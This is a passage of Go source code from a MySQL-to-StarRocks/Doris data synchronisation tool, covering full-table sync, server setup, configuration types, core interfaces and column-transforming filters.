err.Error()) 287 | return 288 | } 289 | return 290 | } 291 | _, err = w.Write(rules) 292 | if err != nil { 293 | log.Errorf("http response write err: ", err.Error()) 294 | return 295 | } 296 | return 297 | } 298 | } 299 | 300 | func PauseHandle(oo core.Output) func(http.ResponseWriter, *http.Request) { 301 | return func(w http.ResponseWriter, r *http.Request) { 302 | 303 | err := oo.Pause() 304 | if err != nil { 305 | _, err = w.Write([]byte(fmt.Sprintf("result: pause err: %v\n", err.Error()))) 306 | if err != nil { 307 | log.Errorf("http response write err: ", err.Error()) 308 | return 309 | } 310 | return 311 | } 312 | _, err = w.Write([]byte("result: pause handle successfully.\n")) 313 | if err != nil { 314 | log.Errorf("http response write err: ", err.Error()) 315 | return 316 | } 317 | return 318 | } 319 | } 320 | 321 | func ResumeHandle(oo core.Output) func(http.ResponseWriter, *http.Request) { 322 | return func(w http.ResponseWriter, r *http.Request) { 323 | 324 | err := oo.Resume() 325 | if err != nil { 326 | _, err = w.Write([]byte(fmt.Sprintf("result: resume err: %v\n", err.Error()))) 327 | if err != nil { 328 | log.Errorf("http response write err: ", err.Error()) 329 | return 330 | } 331 | return 332 | } 333 | _, err = w.Write([]byte("result: resume handle successfully.\n")) 334 | if err != nil { 335 | log.Errorf("http response write err: ", err.Error()) 336 | return 337 | } 338 | return 339 | } 340 | } 341 | 342 | func FullSync(ip core.Input, oo core.Output, ruleMap map[string]interface{}, s core.Schema) (e error, fullRows int) { 343 | // handle full data sync 344 | log.Infof("start handle full data sync...") 345 | switch inputPlugin := ip.(type) { 346 | case *input.MysqlInputPlugin: 347 | sourceSchema := fmt.Sprintf("%v", ruleMap["source-schema"]) 348 | targetSchema := fmt.Sprintf("%v", ruleMap["target-schema"]) 349 | sourceTable := fmt.Sprintf("%v", ruleMap["source-table"]) 350 | targetTable := fmt.Sprintf("%v", ruleMap["target-table"]) 351 | // 同步历史全量数据 352 | // init conn 353 | conn, err := client.Connect(fmt.Sprintf("%s:%d", inputPlugin.Host, inputPlugin.Port), 354 | inputPlugin.UserName, inputPlugin.Password, "", func(c *client.Conn) { _ = c.SetCharset("utf8") }) 355 | if err != nil { 356 | log.Errorf("rule map init conn failed. err: ", err.Error()) 357 | return err, 0 358 | } 359 | // bug fix: c.SetCharset no set utf8mb4, separate set utf8mb4 support emoji 360 | _, _ = conn.Execute("set names utf8mb4") 361 | // get primary key 362 | primarySql := fmt.Sprintf("SELECT COLUMN_NAME, DATA_TYPE "+ 363 | "FROM INFORMATION_SCHEMA.COLUMNS "+ 364 | "WHERE TABLE_SCHEMA = '%s' AND TABLE_NAME = '%s' AND COLUMN_KEY = 'PRI'", sourceSchema, sourceTable) 365 | rs, err := conn.Execute(primarySql) 366 | if err != nil { 367 | log.Errorf("add rule get primary key failed. err: ", err.Error()) 368 | return err, 0 369 | } 370 | 371 | if rs.RowNumber() == 0 { 372 | log.Errorf("handling not primary keys table is not currently supported") 373 | return errors.New("handling not primary keys table is not currently supported"), 0 374 | } 375 | 376 | var primaryKeyColumns []string 377 | for i := 0; i < rs.RowNumber(); i++ { 378 | columnName, _ := rs.GetString(i, 0) 379 | primaryKeyColumns = append(primaryKeyColumns, columnName) 380 | } 381 | 382 | queryColumnsSql := fmt.Sprintf("SELECT COLUMN_NAME "+ 383 | "FROM information_schema.columns "+ 384 | "WHERE table_schema = '%s' "+ 385 | "AND table_name = '%s' ORDER BY ORDINAL_POSITION", sourceSchema, sourceTable) 386 | rs, err = conn.Execute(queryColumnsSql) 387 | if err != nil { 388 | log.Errorf("add rule get columns failed. err: ", err.Error()) 389 | return err, 0 390 | } 391 | var columns []string 392 | for i := 0; i < rs.RowNumber(); i++ { 393 | columnName, _ := rs.GetString(i, 0) 394 | columns = append(columns, columnName) 395 | } 396 | querySql := fmt.Sprintf("SELECT * "+ 397 | "FROM %s.%s ORDER BY %s", sourceSchema, sourceTable, strings.Join(primaryKeyColumns, ",")) 398 | var result mysql.Result 399 | batchSize := 10000 400 | tmpIndex := 0 401 | var jsonRows []string 402 | var totalSize int32 403 | tableObj, err := s.GetTable(sourceSchema, sourceTable) 404 | if err != nil { 405 | return err, 0 406 | } 407 | 408 | stopTickerChan := make(chan interface{}, 1) 409 | defer close(stopTickerChan) 410 | timerPrintFullSyncDataRows(stopTickerChan, targetSchema, targetTable, &fullRows) 411 | 412 | switch outputPlugin := oo.(type) { 413 | case *output.Doris: 414 | err = conn.ExecuteSelectStreaming(querySql, &result, func(row []mysql.FieldValue) error { 415 | m := make(map[string]interface{}) 416 | for idx, val := range row { 417 | ret := val.Value() 418 | if val.Type == 4 { 419 | _, ok := val.Value().([]uint8) 420 | if ok { 421 | ret = string(val.Value().([]uint8)) 422 | } 423 | } 424 | m[columns[idx]] = ret 425 | } 426 | m[output.DeleteColumn] = 0 427 | b, _ := jsoniter.Marshal(m) 428 | jsonRows = append(jsonRows, string(b)) 429 | tmpIndex += 1 430 | // prom read event number counter 431 | metrics.OpsReadProcessed.Inc() 432 | if tmpIndex%batchSize == 0 { 433 | err = outputPlugin.SendData(jsonRows, tableObj, targetSchema, targetTable, nil) 434 | if err != nil { 435 | return err 436 | } 437 | fullRows = tmpIndex 438 | jsonRows = jsonRows[0:0] 439 | } 440 | return nil 441 | }, nil) 442 | 443 | if err != nil { 444 | log.Errorf("handling execute select streaming failed. err: %v", err.Error()) 445 | return err, tmpIndex 446 | } 447 | 448 | if len(jsonRows) > 0 { 449 | err = outputPlugin.SendData(jsonRows, tableObj, targetSchema, targetTable, nil) 450 | if err != nil { 451 | return err, tmpIndex 452 | } 453 | fullRows = tmpIndex 454 | } 455 | case *output.Starrocks: 456 | err = conn.ExecuteSelectStreaming(querySql, &result, func(row []mysql.FieldValue) error { 457 | m := make(map[string]interface{}) 458 | for idx, val := range row { 459 | ret := val.Value() 460 | if val.Type == 4 { 461 | _, ok := val.Value().([]uint8) 462 | if ok { 463 | if tableObj.Columns[idx].RawType == "json" { 464 | jsonCol := map[string]interface{}{} 465 | _ = json.Unmarshal(val.Value().([]uint8), &jsonCol) 466 | ret = jsonCol 467 | } else { 468 | ret = string(val.Value().([]uint8)) 469 | } 470 | } 471 | } 472 | m[columns[idx]] = ret 473 | } 474 | m[output.DeleteColumn] = 0 475 | b, _ := jsoniter.Marshal(m) 476 | totalSize = totalSize + int32(len(b)) 477 | jsonRows = append(jsonRows, string(b)) 478 | tmpIndex += 1 479 | // prom read event number counter 480 | metrics.OpsReadProcessed.Inc() 481 | // row lines = 10000 || totalSize >= 90M, 避免超过100M写入失败 (fix #23 ) 482 | if tmpIndex%batchSize == 0 || totalSize >= 94371840 { 483 | err = outputPlugin.SendData(jsonRows, tableObj, targetSchema, targetTable, nil) 484 | if err != nil { 485 | return err 486 | } 487 | fullRows = tmpIndex 488 | jsonRows = jsonRows[0:0] 489 | totalSize = 0 490 | } 491 | return nil 492 | }, nil) 493 | 494 | if err != nil { 495 | log.Errorf("handling execute select streaming failed. err: %v", err.Error()) 496 | return err, tmpIndex 497 | } 498 | 499 | if len(jsonRows) > 0 { 500 | err = outputPlugin.SendData(jsonRows, tableObj, targetSchema, targetTable, nil) 501 | if err != nil { 502 | return err, tmpIndex 503 | } 504 | fullRows = tmpIndex 505 | } 506 | default: 507 | // TODO 508 | } 509 | log.Infof("full data sync total rows: %d", tmpIndex) 510 | err = conn.Close() 511 | if err != nil { 512 | return err, tmpIndex 513 | } 514 | log.Infof("close conn") 515 | } 516 | log.Infof("end handle full data sync") 517 | return nil, fullRows 518 | } 519 | 520 | func timerPrintFullSyncDataRows(stopTickerChan chan interface{}, targetSchema string, targetTable string, fullRows *int) { 521 | // timer print full sync data rows 522 | ticker := time.NewTicker(time.Second * 3) 523 | go func() { 524 | defer ticker.Stop() 525 | for { 526 | select { 527 | case <-ticker.C: 528 | log.Infof("full sync data %s.%s rows: %d", targetSchema, targetTable, *fullRows) 529 | case <-stopTickerChan: 530 | log.Debugf("quit print full sync data rows goroutine") 531 | return 532 | } 533 | } 534 | }() 535 | } 536 | -------------------------------------------------------------------------------- /pkg/app/server.go: -------------------------------------------------------------------------------- 1 | package app 2 | 3 | import ( 4 | "github.com/juju/errors" 5 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/filter" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 10 | "github.com/siddontang/go-log/log" 11 | "sync" 12 | ) 13 | 14 | type Server struct { 15 | Input core.Input 16 | InputPosition core.Position 17 | InputSchema core.Schema 18 | Output core.Output 19 | OutPutRule core.Rule 20 | SyncChan *channel.SyncChannel 21 | outputChan *channel.OutputChannel 22 | matcherFilter filter.MatcherFilter 23 | sync.Mutex 24 | } 25 | 26 | func NewServer(config *config.BaseConfig) (*Server, error) { 27 | server := Server{} 28 | 29 | // output 30 | plugin, err := registry.GetPlugin(registry.OutputPlugin, config.OutputConfig.Type) 31 | if err != nil { 32 | return nil, errors.Trace(err) 33 | } 34 | log.Infof("load output plugin: %v", config.OutputConfig.Type) 35 | output, ok := plugin.(core.Output) 36 | if !ok { 37 | return nil, errors.Errorf("not a valid output plugin: %v", config.OutputConfig.Type) 38 | } 39 | server.Output = output 40 | err = plugin.Configure(config.OutputConfig.Type, config.OutputConfig.Config) 41 | if err != nil { 42 | return nil, err 43 | } 44 | 45 | // output rule 46 | plugin, err = registry.GetPlugin(registry.OutputRulePlugin, config.OutputConfig.Type) 47 | if err != nil { 48 | return nil, errors.Trace(err) 49 | } 50 | log.Infof("load output rule plugin: %v", config.OutputConfig.Type) 51 | rule, ok := plugin.(core.Rule) 52 | if !ok { 53 | return nil, errors.Errorf("not a valid output rule plugin: %v", config.OutputConfig.Type) 54 | } 55 | server.OutPutRule = rule 56 | err = plugin.Configure(config.OutputConfig.Type, config.OutputConfig.Config) 57 | if err != nil { 58 | return nil, err 59 | } 60 | 61 | // input 62 | plugin, err = registry.GetPlugin(registry.InputPlugin, config.InputConfig.Type) 63 | if err != nil { 64 | return nil, errors.Trace(err) 65 | } 66 | log.Infof("load input plugin: %v", config.InputConfig.Type) 67 | input, ok := plugin.(core.Input) 68 | if !ok { 69 | return nil, errors.Errorf("not a valid input type") 70 | } 71 | server.Input = input 72 | err = plugin.Configure(config.InputConfig.Type, config.InputConfig.Config) 73 | if err != nil { 74 | return nil, err 75 | } 76 | 77 | // input position 78 | plugin, err = registry.GetPlugin(registry.InputPositionPlugin, config.InputConfig.Type) 79 | if err != nil { 80 | return nil, errors.Trace(err) 81 | } 82 | log.Infof("load input position plugin: %v", config.InputConfig.Type) 83 | position, ok := plugin.(core.Position) 84 | if !ok { 85 | return nil, errors.Errorf("not a valid input position plugin: %v", config.InputConfig.Type) 86 | } 87 | server.InputPosition = position 88 | 89 | // input schema 90 | plugin, err = registry.GetPlugin(registry.InputSchemaPlugin, config.InputConfig.Type) 91 | if err != nil { 92 | return nil, errors.Trace(err) 93 | } 94 | log.Infof("load input schema plugin: %v", config.InputConfig.Type) 95 | schema, ok := plugin.(core.Schema) 96 | if !ok { 97 | return nil, errors.Errorf("not a valid input schema plugin: %v", config.InputConfig.Type) 98 | } 99 | server.InputSchema = schema 100 | 101 | // 加载position 102 | positionData := position.LoadPosition(config) 103 | // 初始化schema 104 | schema.NewSchemaTables(config, config.InputConfig.Config, positionData, server.OutPutRule.GetRuleToMap()) 105 | // 初始化output 106 | server.Output.NewOutput(nil, server.OutPutRule.GetRuleToMap(), server.InputSchema) 107 | // 初始化input 108 | server.Input.NewInput(nil, server.OutPutRule.GetRuleToRegex(), server.InputSchema) 109 | // 初始化channel 110 | server.SyncChan = &channel.SyncChannel{} 111 | server.SyncChan.NewChannel(config.SyncParamConfig) 112 | server.outputChan = &channel.OutputChannel{} 113 | server.outputChan.NewChannel(config.SyncParamConfig) 114 | // 初始化filter配置 115 | server.matcherFilter = filter.NewMatcherFilter(config.FilterConfig) 116 | 117 | return &server, nil 118 | } 119 | 120 | func (s *Server) Start() error { 121 | s.Lock() 122 | defer s.Unlock() 123 | 124 | // 启动input插件 125 | s.InputPosition = s.Input.StartInput(s.InputPosition, s.SyncChan) 126 | // 启动position 127 | s.InputPosition.StartPosition() 128 | // 启动filter 129 | s.matcherFilter.StartFilter(s.SyncChan, s.outputChan, s.InputSchema) 130 | // 启动output插件 131 | go s.Output.StartOutput(s.outputChan) 132 | 133 | return nil 134 | } 135 | -------------------------------------------------------------------------------- /pkg/channel/ch_input.go: -------------------------------------------------------------------------------- 1 | package channel 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 5 | ) 6 | 7 | type SyncChannel struct { 8 | SyncChan chan interface{} 9 | FLushCHanMaxWaitSecond int 10 | Done chan struct{} 11 | } 12 | 13 | func (sc *SyncChannel) NewChannel(config *config.SyncParamConfig) { 14 | sc.SyncChan = make(chan interface{}, config.ChannelSize) 15 | sc.FLushCHanMaxWaitSecond = config.FlushDelaySecond 16 | sc.Done = make(chan struct{}) 17 | } 18 | 19 | func (sc *SyncChannel) GetChannel() interface{} { 20 | return sc 21 | } 22 | 23 | func (sc *SyncChannel) Close() { 24 | close(sc.Done) 25 | } 26 | -------------------------------------------------------------------------------- /pkg/channel/ch_output.go: -------------------------------------------------------------------------------- 1 | package channel 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 5 | ) 6 | 7 | type OutputChannel struct { 8 | SyncChan chan interface{} 9 | ChannelSize int 10 | FLushCHanMaxWaitSecond int 11 | Done chan struct{} 12 | } 13 | 14 | func (oc *OutputChannel) NewChannel(config *config.SyncParamConfig) { 15 | oc.SyncChan = make(chan interface{}, config.ChannelSize) 16 | oc.ChannelSize = config.ChannelSize 17 | oc.FLushCHanMaxWaitSecond = config.FlushDelaySecond 18 | oc.Done = make(chan struct{}) 19 | } 20 | 21 | func (oc *OutputChannel) GetChannel() interface{} { 22 | return oc 23 | } 24 | 25 | func (oc *OutputChannel) Close() { 26 | close(oc.Done) 27 | } 28 | -------------------------------------------------------------------------------- /pkg/channel/interface.go: -------------------------------------------------------------------------------- 1 | package channel 2 | 3 | import "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 4 | 5 | type Channel interface { 6 | NewChannel(config *config.SyncParamConfig) 7 | GetChannel() interface{} 8 | Close() 9 | } 10 | -------------------------------------------------------------------------------- /pkg/config/base.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | import ( 4 | "github.com/BurntSushi/toml" 5 | "github.com/juju/errors" 6 | "github.com/siddontang/go-log/log" 7 | "path/filepath" 8 | ) 9 | 10 | type BaseConfig struct { 11 | Name string 12 | InputConfig *InputConfig `toml:"input"` 13 | OutputConfig *OutputConfig `toml:"output"` 14 | SyncParamConfig *SyncParamConfig `toml:"sync-param"` 15 | FilterConfig []*FilterConfig `toml:"filter"` 16 | FileName *string 17 | } 18 | 19 | type MysqlConfig struct { 20 | Host string 21 | Port int 22 | UserName string 23 | Password string 24 | } 25 | 26 | type MongoConfig struct { 27 | Uri string 28 | UserName string 29 | Password string 30 | } 31 | 32 | type StarrocksConfig struct { 33 | Host string 34 | Port int 35 | LoadPort int `mapstructure:"load-port"` 36 | UserName string 37 | Password string 38 | } 39 | 40 | type DorisConfig struct { 41 | Host string 42 | Port int 43 | LoadPort int `mapstructure:"load-port"` 44 | UserName string 45 | Password string 46 | } 47 | 48 | type SyncParamConfig struct { 49 | ChannelSize int `toml:"channel-size"` 50 | FlushDelaySecond int `toml:"flush-delay-second"` 51 | } 52 | 53 | type FilterConfig struct { 54 | Type string `toml:"type"` 55 | Config map[string]interface{} `toml:"config"` 56 | } 57 | 58 | type InputConfig struct { 59 | Type string `toml:"type"` 60 | StartPosition string `toml:"start-position"` 61 | Config map[string]interface{} `toml:"config"` 62 | } 63 | 64 | type OutputConfig struct { 65 | Type string `toml:"type"` 66 | Config map[string]interface{} `toml:"config"` 67 | } 68 | 69 | func NewBaseConfig(fileName *string) *BaseConfig { 70 | var bc = &BaseConfig{} 71 | fileNamePath, err := filepath.Abs(*fileName) 72 | if err != nil { 73 | log.Fatal(err) 74 | } 75 | bc.FileName = &fileNamePath 76 | err = bc.ReadBaseConfig() 77 | if err != nil { 78 | log.Fatal(err) 79 | } 80 | return bc 81 | } 82 | 83 | func (bc *BaseConfig) ReadBaseConfig() error { 84 | var err error 85 | if _, err = toml.DecodeFile(*bc.FileName, bc); err != nil { 86 | return errors.Trace(err) 87 | } 88 | return err 89 | } 90 | -------------------------------------------------------------------------------- /pkg/core/input.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 5 | "regexp" 6 | ) 7 | 8 | type Input interface { 9 | NewInput(config interface{}, ruleRegex []string, inSchema Schema) 10 | StartInput(pos Position, syncChan *channel.SyncChannel) Position 11 | StartMetrics() 12 | Close() 13 | SetIncludeTableRegex(map[string]interface{}) (*regexp.Regexp, error) // for add rule 14 | RemoveIncludeTableRegex(map[string]interface{}) (*regexp.Regexp, error) // for delete rule 15 | } 16 | -------------------------------------------------------------------------------- /pkg/core/output.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 5 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 7 | ) 8 | 9 | type Output interface { 10 | NewOutput(config interface{}, rulesMap map[string]interface{}, inSchema Schema) 11 | StartOutput(outputChan *channel.OutputChannel) 12 | Execute(msgs []*msg.Msg, tableObj *schema.Table, targetSchema string, targetTable string) error 13 | Close() 14 | AddRule(map[string]interface{}) error 15 | DeleteRule(map[string]interface{}) error 16 | GetRules() interface{} 17 | Pause() error 18 | Resume() error 19 | IsPaused() bool 20 | } 21 | -------------------------------------------------------------------------------- /pkg/core/position.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 4 | 5 | type Position interface { 6 | LoadPosition(config *config.BaseConfig) string 7 | SavePosition() error 8 | ModifyPosition(v string) error 9 | StartPosition() 10 | Close() 11 | } 12 | -------------------------------------------------------------------------------- /pkg/core/rule.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | type Rule interface { 4 | NewRule(map[string]interface{}) 5 | GetRuleToRegex() []string 6 | GetRuleToMap() map[string]interface{} 7 | GetRule(key string) interface{} 8 | TargetString() string 9 | } 10 | -------------------------------------------------------------------------------- /pkg/core/schema.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 5 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 7 | ) 8 | 9 | type Schema interface { 10 | NewSchemaTables(config *config.BaseConfig, pluginConfig map[string]interface{}, startPos string, rulesMap map[string]interface{}) 11 | AddTableForMsg(msg *msg.Msg) error 12 | AddTable(db string, table string) (*schema.Table, error) 13 | DelTable(db string, table string) error 14 | UpdateTable(db string, table string, args interface{}, pos string, index int) error 15 | GetTable(db string, table string) (*schema.Table, error) 16 | RefreshTable(db string, table string) 17 | SaveMeta(data string) error 18 | Close() 19 | } 20 | -------------------------------------------------------------------------------- /pkg/filter/filter_convert_dml_column.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "github.com/juju/errors" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/utils" 9 | "github.com/siddontang/go-log/log" 10 | ) 11 | 12 | const ConvertDmlColumnFilterName = "convert-dml-column" 13 | 14 | type ConvertDmlColumnFilter struct { 15 | name string 16 | matchSchema string 17 | matchTable string 18 | columns []string 19 | castAs []string 20 | } 21 | 22 | func (cdcf *ConvertDmlColumnFilter) NewFilter(config map[string]interface{}) error { 23 | columns, ok := config["columns"] 24 | if !ok { 25 | return errors.Trace(errors.New("'columns' is not configured")) 26 | } 27 | castAs, ok := config["cast-as"] 28 | if !ok { 29 | return errors.Trace(errors.New("'cast-as' is not configured")) 30 | } 31 | 32 | c, ok := utils.CastToSlice(columns) 33 | if !ok { 34 | return errors.Trace(errors.New("'columns' should be an array")) 35 | } 36 | 37 | columnsString, err := utils.CastSliceInterfaceToSliceString(c) 38 | if err != nil { 39 | return errors.Trace(errors.New("'columns' should be an array of string")) 40 | } 41 | 42 | ca, ok := utils.CastToSlice(castAs) 43 | if !ok { 44 | return errors.Trace(errors.New("'cast-as' should be an array")) 45 | } 46 | 47 | castAsString, err := utils.CastSliceInterfaceToSliceString(ca) 48 | if err != nil { 49 | return errors.Trace(errors.New("'cast-as' should be an array of string")) 50 | } 51 | 52 | if len(c) != len(ca) { 53 | return errors.Trace(errors.New("'columns' should have the same length of 'cast-as'")) 54 | } 55 | 56 | cdcf.name = ConvertDmlColumnFilterName 57 | cdcf.matchSchema = fmt.Sprintf("%v", config["match-schema"]) 58 | cdcf.matchTable = fmt.Sprintf("%v", config["match-table"]) 59 | cdcf.columns = columnsString 60 | cdcf.castAs = castAsString 61 | return nil 62 | } 63 | 64 | func (cdcf *ConvertDmlColumnFilter) Filter(msg *msg.Msg) bool { 65 | if cdcf.matchSchema == msg.Database && cdcf.matchTable == msg.Table { 66 | for i, column := range cdcf.columns { 67 | value := FindColumn(msg.DmlMsg.Data, column) 68 | if value != nil { 69 | if value == "" { 70 | continue 71 | } 72 | 73 | switch cdcf.castAs[i] { 74 | case "json": 75 | var columnJson map[string]interface{} 76 | err := json.Unmarshal([]byte(fmt.Sprintf("%v", value)), &columnJson) 77 | if err != nil { 78 | log.Warnf("%s filter error: %v, column '%s' value: '%v' cast as json error, row event: %v", 79 | cdcf.name, err.Error(), column, value, msg.DmlMsg.Data) 80 | } 81 | msg.DmlMsg.Data[column] = columnJson 82 | case "arrayJson": 83 | var columnArrayJson []map[string]interface{} 84 | err := json.Unmarshal([]byte(fmt.Sprintf("%v", value)), &columnArrayJson) 85 | if err != nil { 86 | log.Warnf("%s filter error: %v, column '%s' value: '%v' cast as json error, row event: %v", 87 | cdcf.name, err.Error(), column, value, msg.DmlMsg.Data) 88 | } 89 | msg.DmlMsg.Data[column] = columnArrayJson 90 | } 91 | } 92 | } 93 | } 94 | return false 95 | } 96 | -------------------------------------------------------------------------------- /pkg/filter/filter_convert_snakecase_column.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | import ( 4 | "github.com/iancoleman/strcase" 5 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 6 | ) 7 | 8 | const ConvertSnakeCaseColumnFilterName = "convert-snakecase-column" 9 | 10 | type ConvertSnakeCaseColumnFilter struct { 11 | name string 12 | } 13 | 14 | func (cdcf *ConvertSnakeCaseColumnFilter) NewFilter(config map[string]interface{}) error { 15 | cdcf.name = ConvertSnakeCaseColumnFilterName 16 | return nil 17 | } 18 | 19 | func (cdcf *ConvertSnakeCaseColumnFilter) Filter(m *msg.Msg) bool { 20 | if m.Type == msg.MsgCtl { 21 | return false 22 | } 23 | for v := range m.DmlMsg.Data { 24 | snakeName := strcase.ToSnake(v) 25 | if snakeName != v { 26 | m.DmlMsg.Data[snakeName] = m.DmlMsg.Data[v] 27 | delete(m.DmlMsg.Data, v) 28 | } 29 | } 30 | return false 31 | } 32 | -------------------------------------------------------------------------------- /pkg/filter/filter_delete_dml_column.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | import ( 4 | "fmt" 5 | "github.com/juju/errors" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/utils" 8 | ) 9 | 10 | const DeleteDMLColumnFilterName = "delete-dml-column" 11 | 12 | type DeleteDmlColumnFilter struct { 13 | name string 14 | matchSchema string 15 | matchTable string 16 | columns []string 17 | } 18 | 19 | func (ddcf *DeleteDmlColumnFilter) NewFilter(config map[string]interface{}) error { 20 | columns := config["columns"] 21 | c, ok := utils.CastToSlice(columns) 22 | if !ok { 23 | return errors.Trace(errors.New("'column' should be an array")) 24 | } 25 | 26 | columnsString, err := utils.CastSliceInterfaceToSliceString(c) 27 | if err != nil { 28 | return errors.Trace(errors.New("'column' should be an array of string")) 29 | } 30 | ddcf.name = DeleteDMLColumnFilterName 31 | ddcf.matchSchema = fmt.Sprintf("%v", config["match-schema"]) 32 | ddcf.matchTable = fmt.Sprintf("%v", config["match-table"]) 33 | ddcf.columns = columnsString 34 | return nil 35 | } 36 | 37 | func (ddcf *DeleteDmlColumnFilter) Filter(msg *msg.Msg) bool { 38 | if ddcf.matchSchema == msg.Database && ddcf.matchTable == msg.Table { 39 | for _, column := range ddcf.columns { 40 | value := FindColumn(msg.DmlMsg.Data, column) 41 | if value != nil { 42 | delete(msg.DmlMsg.Data, column) 43 | // msg.IgnoreColumns = append(msg.IgnoreColumns, column) 44 | } 45 | } 46 | } 47 | return false 48 | } 49 | -------------------------------------------------------------------------------- /pkg/filter/filter_js_dml_column.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | import ( 4 | "fmt" 5 | "github.com/dop251/goja" 6 | "github.com/juju/errors" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 8 | "github.com/siddontang/go-log/log" 9 | "os" 10 | ) 11 | 12 | const JsDmlColumnFilterName = "js-dml-column" 13 | 14 | type JsDmlColumnFilter struct { 15 | name string 16 | matchSchema string 17 | matchTable string 18 | JsFile string 19 | JsVm *goja.Runtime 20 | processRow func(map[string]interface{}) *goja.Object 21 | } 22 | 23 | func (jdcf *JsDmlColumnFilter) NewFilter(config map[string]interface{}) error { 24 | jsFile, ok := config["js-file"] 25 | if !ok { 26 | return errors.Trace(errors.New("'js-file' is not configured")) 27 | } 28 | jdcf.name = JsDmlColumnFilterName 29 | jdcf.matchSchema = fmt.Sprintf("%v", config["match-schema"]) 30 | jdcf.matchTable = fmt.Sprintf("%v", config["match-table"]) 31 | jdcf.JsFile = fmt.Sprintf("%v", jsFile) 32 | err := jdcf.loadJs() 33 | if err != nil { 34 | return err 35 | } 36 | return nil 37 | } 38 | 39 | func (jdcf *JsDmlColumnFilter) Filter(msg *msg.Msg) bool { 40 | if jdcf.matchSchema == msg.Database && jdcf.matchTable == msg.Table { 41 | for k, v := range msg.DmlMsg.Data { 42 | switch v.(type) { 43 | case int64: 44 | msg.DmlMsg.Data[k] = fmt.Sprintf("%v", v) 45 | } 46 | } 47 | rs := jdcf.processRow(msg.DmlMsg.Data) 48 | if rs == nil { 49 | return true 50 | } 51 | var res map[string]interface{} 52 | err := jdcf.JsVm.ExportTo(rs, &res) 53 | if err != nil { 54 | log.Fatal(err) 55 | } 56 | msg.DmlMsg.Data = res 57 | } 58 | return false 59 | } 60 | 61 | func (jdcf *JsDmlColumnFilter) loadJs() error { 62 | file, err := os.ReadFile(jdcf.JsFile) 63 | if err != nil { 64 | return err 65 | } 66 | vm := goja.New() 67 | vm.SetFieldNameMapper(goja.TagFieldNameMapper("json", true)) 68 | _, err = vm.RunString(string(file)) 69 | if err != nil { 70 | return err 71 | } 72 | err = vm.ExportTo(vm.Get("process_row"), &jdcf.processRow) 73 | if err != nil { 74 | return err 75 | } 76 | jdcf.JsVm = vm 77 | return nil 78 | } 79 | -------------------------------------------------------------------------------- /pkg/filter/filter_rename_dml_column.go: -------------------------------------------------------------------------------- 1 | package filter 2 | 3 | import ( 4 | "fmt" 5 | "github.com/juju/errors" 6 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 7 | "github.com/fatalclarine/go-mysql-starrocks/pkg/utils" 8 | ) 9 | 10 | const RenameDmlColumnFilterName = "rename-dml-column" 11 | 12 | type RenameDmlColumnFilter struct { 13 | name string 14 | matchSchema string 15 | matchTable string 16 | columns []string 17 | renameAs []string 18 | } 19 | 20 | func (rdcf *RenameDmlColumnFilter) NewFilter(config map[string]interface{}) error { 21 | columns, ok := config["columns"] 22 | if !ok { 23 | return errors.Trace(errors.New("'columns' is not configured")) 24 | } 25 | renameAs, ok := config["rename-as"] 26 | if !ok { 27 | return errors.Trace(errors.New("'rename-as' is not configured")) 28 | } 29 | 30 | c, ok := utils.CastToSlice(columns) 31 | if !ok { 32 | return errors.Trace(errors.New("'columns' should be an array")) 33 | } 34 | 35 | columnsString, err := utils.CastSliceInterfaceToSliceString(c) 36 | if err != nil { 37 | return errors.Trace(errors.New("'columns' should be an array of string")) 38 | } 39 | 40 | ra, ok := utils.CastToSlice(renameAs) 41 | if !ok { 42 | return errors.Trace(errors.New("'rename-as' should be an array")) 43 | } 44 | 45 | renameAsString, err := utils.CastSliceInterfaceToSliceString(ra) 46 | if err != nil { 47 | return errors.Trace(errors.New("'cast-as' should be an array of string")) 48 | } 49 | 50 | if len(c) != len(ra) { 51 | return errors.Trace(errors.New("'columns' should have the same length of 'rename-as'")) 52 | } 53 | 54 | rdcf.name = RenameDmlColumnFilterName 55 | rdcf.matchSchema = fmt.Sprintf("%v", config["match-schema"]) 56 | rdcf.matchTable = fmt.Sprintf("%v", config["match-table"]) 57 | rdcf.columns = columnsString 58 | rdcf.renameAs = renameAsString 59 | return nil 60 | } 61 | 62 | func (rdcf *RenameDmlColumnFilter) Filter(msg *msg.Msg) bool { 63 | if rdcf.matchSchema == msg.Database && rdcf.matchTable == msg.Table { 64 | for i, column := range rdcf.columns { 65 | value := FindColumn(msg.DmlMsg.Data, column) 66 | if value != nil { 67 | renameAsColumn := rdcf.renameAs[i] 68 | msg.DmlMsg.Data[renameAsColumn] = 